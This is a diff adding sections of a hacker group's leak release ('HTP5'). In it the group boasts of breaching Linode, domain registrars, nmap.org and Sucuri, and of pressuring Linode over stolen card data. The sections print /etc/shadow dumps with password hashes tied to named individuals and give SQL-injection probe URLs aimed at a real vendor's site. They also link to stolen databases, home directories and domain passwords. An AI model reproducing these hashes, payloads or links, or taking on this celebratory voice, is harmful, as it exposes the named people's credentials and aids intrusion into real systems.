~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUCAUSE-MISCDBS.zip
|- 12MB | EDUCAUSE misc. databases extracted from 6.4GB MSSQL tape backup
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/eduhashindex.txt
|- 143K | EDUCAUSE domain passwords, allow account/DNS modification.
| | For use with /HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

133
htp/HTP5/0x02_Linode.txt Executable file
View File

@ -0,0 +1,133 @@
▄▄ ▀▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒░ ░▒▒▒▒▒▒▒▒▒░░ ▒▒▒▒▒▒▒▒▒▒▒▒░ ▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░ ░ ░░
▒▒█▄▄ ▀▀▄▄ ░ ▒▒▒▒▒▒░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒▒ ░░░░░░░░░░░ ░░░░ ░░░░
▓▒▒▒▒██▄▄ ▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░ ░░░░░░░░░░ ░
▓▓███▓▓▒███▄░▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░ ░░░░░▄▄▄▄▀▀
▓▓█████████▓▒▄▄ ▀▀▀▄▄▄▒▒▒▒ ░░░░░░ ░ ░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▀░▒▒▒▓
▒▒▓▓██████████▓▓▓▒▄▄ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄▄▄▄▄▀▀▀▀▀▀▀ ▒▒▒▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▓▓▓█████
▒▒▒▓▓█████████▓▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▒▒▒▄▄▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▀▀▀▒▒▒▒▒▒▒▒░░░▒███▓▓████
▒▒▒▓██████████▒░░░░░░▒▒▒▒▒█████████████▓ ▒▒▒▒▒▒▒░░░ ░░░░░░░▒▒▓▓▓▓▓▓▒▒░░▒███▓████
▒▒▒▓▓█▓▒▒▒▀▀▀▀▀▀▄▄▄▄▄▄▄▄▒████████████████▒▀▀▀▀▀▄▄▄▄▀▀▀▀▀▀▒▓███████▒░▓██▒░▒█▓▓███
▒▒▒▓████████▓▒░░░░░░░██▒█████████████████▓░▒▒▒▒▒▒▒▒▒▒▒▒░▓████████▒ ▓███▒░░▒███▓
▒▒░▒██▒▓██████ ░░░░░░▓██████████████████▒░▒░░░░░░░░▒░▒████████ ▒████▓░░▓▓▓▓▒
░▒░░▓█░░▒▒▓██▓ ░░░░ ░███████████████████▒░ ▄ ▄▄ ▄░░███████▓ ░ ▓██████▓░▓▒▒▒░
░░░░▒█░░░░▒▓▓░░ ░░ ▒██████████████████▒▀▀▀▀▀░░▀▀▀▀▄██████▒ ░ ▓███████▒ ▓░
░ ░█▒ ░░▒▒░░ ░░░▒█████████████▓▓█▒▀░░░░░░░░░░░▀▒████▓ ▓██████▓░░ ▓
░░ █▒ ▒▒ ░░░░▓█████████▒▒▒░░░░░░░░ ░░░░░░░▒███▒▒▒███████▓ ░ ▓
░░░ ▓▒ ▒ ░▒ ░░ ░░▀▀▓▓▓▓▒░░░░░░░░░░ ░░ ░░░ ▒▓▓▓▓▓███▓▒▒ ░░ ▓
░ ▓▒ ▒▒ ▒▒░ ░░░░░░░░░░░░░░░░░ ░░ ░ ▒▓
░ ░░▓ ░░ ░▒░░ ░░ ░░░░░░ ░░░ ░░░░░ ░ ░▒ ▒
░░ ▓ ░░▒▒░░ ░░ ░░░░░ ░░░░ ░▒ ▓
░▓ ░▒▒░░ ░░░ ░░ ░░░ ░░ ░ ▒ ▒░
▓▒ ░░▒▒░░░ ░░░░░░░ ▀▀▀▄▒▒░░░░▒▄▀▀ ░ ▒ ▒
▒▓░░░░░░▒▒▒░░░░ ░░░░░░░ ░░░▒▒▓▒▒▒▒▓▓▓▓▓▒░░ ░▒ ▓
▒▓ ░░ ░▒▒░░░░░ ░░░▒▒▒▒▒▒▒▓▓█▓▒▒▒▒▒▒▒▒▒▓█▓▓▓▒░ ░▒ █░
▓░ ░▒▓▒░░░░░ ░░░▒▒▓▓▒▒▒▒▒▒▒░░ ░ ░░░▒▒▒██▒░ ░░▒░▒▒
▒▓ ░▒▓▓▒▒░░░░ ░░▒▒▒▒▒░░░░ ░░░░░░░░░ ░░ ░▒▓█▒ ░▒▒░▓
▒▓ ░ ▒▒▒▒▒░░░ ░░▒▒▒▒▒░░░░░░░░░▒▒▒▒▒▒░░░░░░░▒▒▒▒ ░▒▒▒▒▒
▒▒ ░ ▒▒▒░░░░ ░░▒▒░░░░▄▄▄▄▀▀▀▀▀▓▓█▀▀▀▄▄▄▄▒▓░░▒░ ░░▒▒░▒
▒▓ ░ ▒▒▒▒▒▒░░ ░▒▒░░░░ ░░░░ ░ ░░░ ░▒▒ ░░▒▒░ ▒
▒▒ ░ ▒▒▒▓▒▒░░ ░▒░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░▒▒▒▒▒▒░░ ▒
▓▒░▒░░ ░▒▒▓▓▒▒░░ ░▒░░░░░░░░░▒░▒▒▒▒▒▒▒▒░░░░░░░▒▒▓██▓▒ ░▒
░▒▓▓▒▒▒▒▒ ░▒▒▓▓▓▒▒░░░░░▒▓▒░ ░░░░▒░▒▒▓▓▒▒▒▒▒░░░░▒▒▓████▒ ░▒▒░
░▒▒▒▓▓▒▒▒▓▒░ ░▒▓▓▓▓▓▒▒░░░▒▒▓▒▒▒░░░▒▒░▒▒▓▓▓▓▒▒▒▒░▒▒▒▓████▓░ ░▒▒░░
░▒▒▓▒▒▒▓▓▓▓▓▓▒ ░ ▒▒▓▓▓▓▓▒▒▒▓▓▒▓▒▒▒▒▒░▒▒▒▓▓████▓▓▓▓▓▒▓████▓▒░ ░▒▒▒░░░░░
░▒▒▓▒▒░░▒▒█▓▓▓▓▒ ░░ ░▒▒▓███▓▓▓▓▓█▓▒▒▒▒▒▒▒▓▓▓▓███▓▓████████▒▒ ░▒▒▒▒▒░░░░░░
░▒▒▒▒ ▒▒▓█▒▒▓▒░ ░ ░ ░▒▒██████████▓▓▓▒▒▓████████████████▒▒ ░ ░▒▒▒▒▒▒░ ░░░
▒▒▒▒░ ▒▒▒▒▓▒▓▓▒░ ░ ░░▒▓▓█████████▓▓▓▓███████████████▓▒░ ░▒▒▒▒▒▒░
▒▒░ ▒▒▒▒▒█▓▓▒▒ ░░▒▒▒██████████████████████████▓▒▒ ▒▒▒▒▒▒▒░░
▒ ░░░▒▒▒▓██▒▒▒ ░ ░ ░▒▒▒▓█████████████████████▓▒▒░ ░ ▒▒▒▒▒▒░░░ ░
░ ░ ░░░░▒▒▒▒▓█▒▒░░░ ░░░▒▒██████████████████▓▓▒▒░ ░ ░▒▒▒▒░░░░░ ░░
░ ░ ░░░ ▒▒▒▒▒▒▓▓▒░░ ░ ░▒▒▓███▓▓▓█████▓▓▓▓▓▒▒░ ░░▒▒▒░░░░░ ░░░░
░ ░░░░░░ ░▒▒▒▒▒▒▒▓▒ ░ ░▒▒▓▓▓▒▒▓▓▓▓▒▒▒▒▓▒▒░ ░░░▒▒▒▒░░░░ ░░░░░
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"I'm positive they owned."
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄
██ ██ ███▄██ ██ ██ ██ ██ ██▄▄ HTP5
██ ██ ██ ▀██ ██▄██ ██▄█▀ ██▄▄
██ ▄▄ ▄▄
▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
* Before reading this section of HTP5, we recommend you pop some popcorn.
Following HTP4, we were promptly attacked by the next set of skids looking to
get baked by our terabit DDoS cannon. A group impersonating ac1db1tch3z decided
to take an alternative route, and located us through the development of one of
our botnets, Zodiac. We quickly switched into a fallback network and found out
they used SwiftIRC. SwiftIRC's nameservers were none other than Linode.
Oh by the way, actual AB, was your second backdoor in Unreal that eval() shell
stored in their PHPBB MySQL database? if so -- you've finally been expunged ;)
- HTP
Linode turned out to be safe from our null RDS pass 1day (before Adobe had
released their critical advisory). In the meantime, their registrar (name.com)
was taken out. We acquired their domain login (along with StackOverflow,
DeviantArt, etc.), and prepared a transparent proxy to gather Linode logins.
Speaking of registrars, Xinnet, MelbourneIT, and Moniker - you're all owned.
Back in November, we hinted at Huawei access in our Symantec release. Their
registrar? Xinnet. Total domains owned: about 5.5 million total. No kidding. :P
However, right in time, our very own HTP zeroday research division manifested
subzero.py: a zeroday giving us a direct route into Linode. We proceeded to
breach Linode and acquire their in-memory keys. This allowed us to download
Linode's databases and prepare to backdoor SwiftIRC via the LiSH console+
init=/bin/bash.
Meanwhile, we enjoyed our (root) access to Nmap, Nagios, SQLite, OSTicket,
Phusion Passenger (modrails), Mono Project, Prey Project, Pastie, Sucuri, Hak5,
Pwnie Express, Puppet, and oauth. It got better when we found Jen Emick and
xnite were customers, but that's getting into another story.
Unknown to us at the time, the FBI had successfully accessed HTP. They made
their presence obvious, as everything we would get was burned within a few days.
However, we merely considered it to be a leak, and waited to use Linode itself
to identify the source.
Soon after, the FBI alerted Linode that Nmap was being backdoored, unknowingly
identifying themselves as the source of the leaks within HTP. We still
considered it a leak, and told Linode that if they did not act upon our
already-gained access by 5/1, we would shred all of our Linode-related data.
This included 159,000+ decrypted CCs, usernames, $5 hashed passwords, LiSH
usernames, plaintext LiSH passwords, and employee logins. In the case of
noncompliance, we stated that we would drop it all in our release.
This was actually quite a good offer. We made it because we didn't care about
CCs to begin with (that's directed at everyone on Twitter blaming Linode for
identity theft) and because our primary target was SwiftIRC, not Linode. They
accepted to protect their customer data/CCs (there wasn't much choice).
The FBI got pissed off by this development and forced Linode's hand. After
informing them we would follow through and shred all of our Linode data within a
week, the FBI and Linode coordinated a release detailing the breach in an email
to their customers. We were confused. If they just did this on 5/1, nothing
would be affected? Apparently, the FBI did not trust us. We soon found out
Linode's situation was not voluntary.
Linode was between a rock and a hard place. They had to comply with the FBI
(immediately), but doing so would mean all 159,000+ customers would be on Full
Disclosure by 5/1. Recognizing their situation, we instead told them that if
they acknowledged HTP in their analysis, we'd go ahead and shred their customer
data anyway. Readily enabling carders was never part of our plan. They agreed,
and we proceeded to delete our copies of the data for them.
There was one more loose end to tie. We identified which users on HTP were
involved with the FBI, and promptly gained access to one of their cams. Sure
enough, there was a handler standing behind him, monitoring his involvement
in HTP (hi!).
The FBI lost their access into HTP.
So what's in this release, if not Linode? EDIT: Hahaha we guess that was too
hot, we'll give you guys registrar data instead.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss1.png
|- 193K | Linode blog post screenshot 1
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss2.png
|- 179K | Linode blog post screenshot 2
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/registrardata.txt
|- 70K | Data on the registars mentioned above.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

126
htp/HTP5/0x03_Nmap.txt Executable file
View File

@ -0,0 +1,126 @@
░░░░
░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░░░
░░░▒▒▒▒░░░░░░░░░░░░▒▒▒▒▒▒░░░
░░▒▒▒▒░░ ░░░▒▒░░▒░░
░░░░░▒░░ ░░▒▒░░░▒░
░░░░░▒░░░ ░░▒░░░░░░
░░░▒░▒░▒░░ ░▒▒░░░░▒░░
░░░░▒▒▒░▓▒░▒░ ░░▒░░░░░░▒░
░░░░░░▓█▓█▓▒░░░ ░░▒░░░░░░░░▒░
░░░░░░▒▓████▓▒▒░░ ░░░▒░░░▒▒▒▒▒░░░░░░░░▒░
░░░░░░░▒▒███▓▓░░░ ░░░░░▒▒░░░▒░▒▒▒▓▓▓▓▒░░░░░░░░▒░░░
░░░░░░▒▒░░░▓█▓▒░▒ ░░░▒░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░
░░░░░░▒▒░▒▒▒░▒▓▒░ ░░▒▒▒░▒▒▒▓▓▓▓▓▓█▓███▓▓▒░░░░░░░░░░░
░░░░░░░░░░▓▓▒▓▒░░░ ░░░▒▒▒▒▒░▒░░▒▒▒▓▓▓████▓▓░░░░░░░░▒▒░
░░░░░░░░▒░▒░░░▒▓▒░░ ░░▒░░░░░▒▒▒▒▒░░░▒▒▓▓▓███▓░░░░░░░░▒░░
░░░░░░░░░░▒▒░░▓█▓▒░ ░░▒▒▒▒░░▒▓▒▒░▒▒▒▒░░░▒░░▒▓▓▓▒░░░░░░▒░░
░░░░░░░░░░░▒░▒▒▓░░░░ ░▒▒▓▓▓▓▓▓▓▓▓█▓▒▒░░░▒▒▒▒░░░▒▒░░░░░░░▒▒░
░░░░░░░░░░░▒░░▒▒▒░░░░░░ ░░░░▓███████████████▓▓▒░▒▒▒▒▒░░▒▒░░░░▒▒░
░░░░░░░░░░░▒▒▒▒░░▒░░░░░░░░░░░▒▓▓███████████████████████▓▓▓▓▒▒░░░░░
░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░▓████████████████████████▓▒▓▒▒▒░
░░░░░░░░░░░░░░░▒▓░▒░░░░░░░░░░░░░░░░▓██████████████████████████▓▓▒▒░
░░░░░░░░░░░░░░░░░░▓▓▒▒░░░░▒░▒░░░░░░░░▒████████████▓▒▒▓█████████▓▓▓░▒░
░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░░▒▒░░░░░░▒▒░░░░░░░▒▒▓███████▓▓▓▒▒▒▒█████████▓▓▒░▒░
░░░░░░░▓▓▓▒▒▓████████▓▒░░░░░░░▒▒▓▓▓▓░░▒░░░░░░▒▒▓▓▓▓▓▒▒░░░░░▓███████▓▓▓░░░
░░░░░░░░▒▒░░▒▓░▒███████▒░░░░░░░▒▒▓▓▓██▓░░░░░░░░░▒▓▓▒░▒░░▒░░░▒░██████▓▓▓░▒░
░░░░░░░░▒░██▓▓▓░░▓████▒░▒░░░░░░░░█▓▓▓▓▒▒▒▒▒▒▒▒▓▓▒▓▓▓▓▓▒▒░▒░░░▒▒████▓▓▒▒▒░
░░░░░░▒░▒▒█▓▓███▓░░▓█▓░▒▒▓▒▒░░░░▒█▓▓▒░▒░▒▒▒▒▒░░▒░░░▓█████▓███▓▒██▓▓▓▒▒▒░
░░░░░▒▒▓░▒▒▓▓▒▓███▒▒▓▒░░▒██▓░░░░▒██▓▒▒░░░▒▒░░░░░░░░░░▒▓██▓▓░▒▓███▒▓░░░░
░░░░▒▒░▒▓▒▒▒▓▓▒▓███▓░▒░░▒███▓▒░░░▓██▓▒▒░░░░░▒▒░░░░░░░░░▒█▓▓░▒▒▓▓▓▓░▒░
░░░▒▒▒▓▓▓▒▒▒▒░▓▓▒▓███▓▒▒▒▓███▓░░▒▒▓▓▒░▒▒░▒▒▒▓▓▓▓░▒▒▒▓▓▓▒▒▓▒░░▒░▓▓░░░
▒▒▒▓▓▓▓▓▓▒░░▒░▒▒▓░░▓██▓░▒▒▓██▓▓▒▒▓▓░░▒▒░░░▒░▓▓██▒▒▒▓███████▓░▒░▒░░░
░▒░░▒█▓▒▒▒░░▒▒▒░▒▓▒░▒▓█▓▓▒░▓█▓▓█▓▓▒▒░░░▒▒░▒▒▒░▓▓▓▓▓▓▓██▓▓▒▒▓█▒▒░▒░
▒░░▒▒░▒▓░▒▒▒░░▒▒▒▒▓▓▒▒▓██▓▒▒▒▓███▓▓░░░░▒▒▓▓▒░░▒▒███▓▓██▀▀▓▓▓█▓▒▒░
░░░░░▒▒░▒▓▒▒▒░▒░░▒▒▓▓▓▒▓█▓▓▒▒░▓███▓▓▒░░░▒▒▒▓▒▒▓▓████████████▓▒▒░
░▒▒░░░░▒▒▒▒▒░▒░░▒░░▓▓▓▓▓▓█▓▓▒░▒▒██▓██▓▒░░░░░░░▒░▒▒▒▓▓▓█████▓▒▒░
▒▒▒▒▒▒░░░▒░▒▒▒▒░░▒▒▓▓▓▓▓▓████▒▒▒▒▓█████▓▒▒▒▒▒░░░▒░░▒▒▒▓████▒▒░░
░▓▒▓▒▒▒▒░░░▒▒░▒▒░▒▓▓▓▓▓▓▓▓████▓▒░▓▓██▓█████▓▓▓▓▒▒▒▓▓▓▓███▓▒▒░░
░▒▓▓▓▒▒▒▒▒▒▒░▒░▒▒▒▒▓▓▒░▓▓▒▓████▓░▒▓▓█████████████████████▓░░░░
▒░▓░▓▒▒▒▒▒▒░▒░░▒▒▒▓▓▓▓▓░▒▒░▒▓███▓░░▒███████████████████▓░▒░▒░░
▒▓▓▒▓░▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▓▓▓░▒▒▓██▒▒░▓██████████████████▒▒░▒░░░░
▒█▓▓▒▒▒▒▒▒▒▒░▒▒░░▒▒░▒▓▓▓▓▓█▓▒▒▒▓██░▒▓▓████████████████▓▓▒░▒▒▒░░
░▓░░▒░░▒▒▒▒▒▒▒▒░▒▒░▒▒▓▓▓▓████▓▓▓██▓░▓▓▓███████████████▓▓▓░▒░░▒░░
░░▒▒▒░▒░▒▒▒▒▒░▒▒░▒░░▒░▒▓▒▒████▓████▒░█▓███████████████▓▓█▒▒░░░░░░░
░░░░░░▒▒░░░▒▒▒▓▒▒▒▓░▒▒▒▓▓▓█▓▓▓██████░█▓▓██████████████▓██▓▒░░░░░▒░░
░░░░░░▒▒▒▒▒░░▒▒▒░▒▒▒▒░▒▓▓▓▓██▓▓▓▓███▒▓█▓██████████████▒██▓▒▒░▒░▒░▒░░
░░░░░░░░░░░░░░░░░░░░▒▒░░░░▒░░░▒░░▒▒▒▒▓▒▓▓▓██▓▓▓▓▓██▓█▓░▒▒░▒▒░░░░░▒▒░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒░▒▒░▒▒▒▒░░▒▒▒▒░░░░░▒▒░▒▒▓░░░▒▒░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒▒▒░░░░░░░░░▒▒░░
░░░░░░░░░░
"You have to let it all go. Fear, doubt, and disbelief."
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄
███▄ ██ ██▀▄▀██ ██ ██ ██ ██ HTP5
██ ▀█▄██ ██ ▀ ██ ██▀██ ██▀▀
██ ▀██ ██ ██ ██ ██ ██ Whoa. Did we just backdoor Trinity?
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Access to nmap.org (Insecure) was gained through Linode, which also included
svn.nmap.org and Seclists. Based on our approximations, the FBI went into holy-
shit mode beginning when we were backdooring it. We decided to withhold the
private releases, including DARPA CINDER Nmap, and release to you the unabridged
contents of the /home/ directory including those of Fyodor (Gordon Lyon) and
David Fifield. Before we drop you into nmap.com, though, here's their
/etc/shadow for those curious:
[root@web etc]# cat shadow
root:$1$9e0033fd$9M4AIYi9o1.wcm07WGUTZ0:14746:0:99999:7:::
bin:*:14746:0:99999:7:::
daemon:*:14746:0:99999:7:::
adm:*:14746:0:99999:7:::
lp:*:14746:0:99999:7:::
sync:*:14746:0:99999:7:::
shutdown:*:14746:0:99999:7:::
halt:*:14746:0:99999:7:::
mail:*:14746:0:99999:7:::
news:*:14746:0:99999:7:::
uucp:*:14746:0:99999:7:::
operator:*:14746:0:99999:7:::
games:*:14746:0:99999:7:::
gopher:*:14746:0:99999:7:::
ftp:*:14746:0:99999:7:::
nobody:*:14746:0:99999:7:::
vcsa:!!:14746:0:99999:7:::
ntp:!!:14746::::::
sshd:!!:14746::::::
fyodor:$1$71vbn0Qa$34cy/K1mp8ag4C7I3eXqS/:14782:0:99999:7:::
david:$1$cVie3LDG$WOrypVpCcBl.UyA8TKRX20:14783:0:99999:7:::
xfs:!!:14782::::::
apache:!!:14782::::::
web:!!:14782:0:99999:7:::
postfix:!!:14782::::::
webalizer:!!:14783::::::
mysql:!!:14896::::::
postgres:!!:14897::::::
distcache:!!:14924::::::
pcap:!!:15615::::::
mailman:!!:15666::::::
Yep, those are $1. We'll give them the benefit of the doubt: Linode used AES.
By the way, Fyodor, thanks for amis-6.01.DARPA1.tar.gz. We'll be sure to give it
a spin.
AMIS - Adversary Mission Identification System
==============================================
The Adversary Mission Identification System (AMIS) is a computer program
that analyzes logs of network scans and reports possible signs of an
adversary mission.
The AMIS is designed to work with the logs produced by the Nmap Security
Scanner. It is part of an overall defensive system that includes
periodic scans and their analysis.
The AMIS checks for these "tells" that may be signs of an insider
mission:
* Newly opened ports, particularly those of file servers (e.g. HTTP,
FTP, and P2P services).
* Differences in files shared by known file servers, including new
files, deleted files, and changes in file metadata.
* Security vulnerabilities in servers.
Enjoy this section of HTP5.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Nmap/home.tgz
|- 16GB | Nmap.org: /home/
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

110
htp/HTP5/0x04_Sucuri.txt Executable file
View File

@ -0,0 +1,110 @@
▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄
██ ██ ██ ██ ██ ██ ██▄▄█ ██ HTP5
██▄▄▄▄▄▄ ██▄▄██ ██▄▄▄ ██▄▄██ ██ ▀▄▄▄▄▄██▄▄▄
██
▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
"Sucuri is a company that offers a security service that detects unauthorized
changes to network (cloud) assets, including web sites, DNS, Whois records, SSL
certificates and others. It is also heavily used as an early warning system to
detect Malware, Spam and other security issues on web sites and DNS hijacking."
Sucuri, why didn't you announce that you got owned? Pretty useless warning
system, if you ask us.
[root@sucuri www]# uname -a
Linux sucuri.net 2.6.39.1-linode34 #1 SMP Tue Jun 21 10:29:24 EDT 2011 i686 i686
i386 GNU/Linux
2001, here we come
[root@sucuri www]# cat /etc/shadow
root:iFvywDsrRwmjI:15755:0:99999:7:::
bin:*:14746:0:99999:7:::
daemon:*:14746:0:99999:7:::
adm:*:14746:0:99999:7:::
lp:*:14746:0:99999:7:::
sync:*:14746:0:99999:7:::
shutdown:*:14746:0:99999:7:::
halt:*:14746:0:99999:7:::
mail:*:14746:0:99999:7:::
news:*:14746:0:99999:7:::
uucp:*:14746:0:99999:7:::
operator:*:14746:0:99999:7:::
games:*:14746:0:99999:7:::
gopher:*:14746:0:99999:7:::
ftp:*:14746:0:99999:7:::
nobody:*:14746:0:99999:7:::
vcsa:!!:14746:0:99999:7:::
ntp:!!:14746::::::
sshd:!!:14746::::::
dre:mAuUxgVOcOeAE:15678:0:99999:7:::
apache:!!:14898::::::
mysql:!!:14898::::::
mailnull:!!:14946::::::
smmsp:!!:14946::::::
ossec:!!:15461:0:99999:7:::
^ OSSEC? Here, We're sure you'll get a kick out of this:
TrendMicro (owns OSSEC) DB access via SQLi:
http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=5
http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=4
Included in this segment of HTP5 are the databases of Sucuri's primary site,
though labs.sucuri.net and the rest of their VPS's were also compromised.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Sucuri/dbs.tgz
|- 2.1MB | Sucuri WP DB's
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"GREGORY D. EVANS, BABY! NUMBA 1!"
░░░▒▒▒▒░░░░░░░
░░▒▒▒▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒▒░░
░▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒░
░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▓▓▒▒▒▒▒
▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒░
▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒
▒▒▒▒▒▒▒▒░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒
▒▒▒▒▒▒▒░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
░▒▒▒▒▒▒░░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
▒▒▒▒▒▒▒░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
▒▒▒▒▒▒▒▒░░░░░░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
░▒▒▒▒▒▒▒▒░░░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓░
▒▒▒▒▒▒▒░░░░░░ ░░ ░░░ ░░░▒▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓░
▒▒▒▒▒▒▒░░░░░░ ░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
░▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒▒
░▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░▒▒▓▓▓▓▓▓▒▒░▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
▓▓▓▒▓▓▓▓▓▓▓▓▓▓▒▒░░░░▒▓▓▓▓▓▓▒▓▄▓▓▓▓▓▓▓▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓░
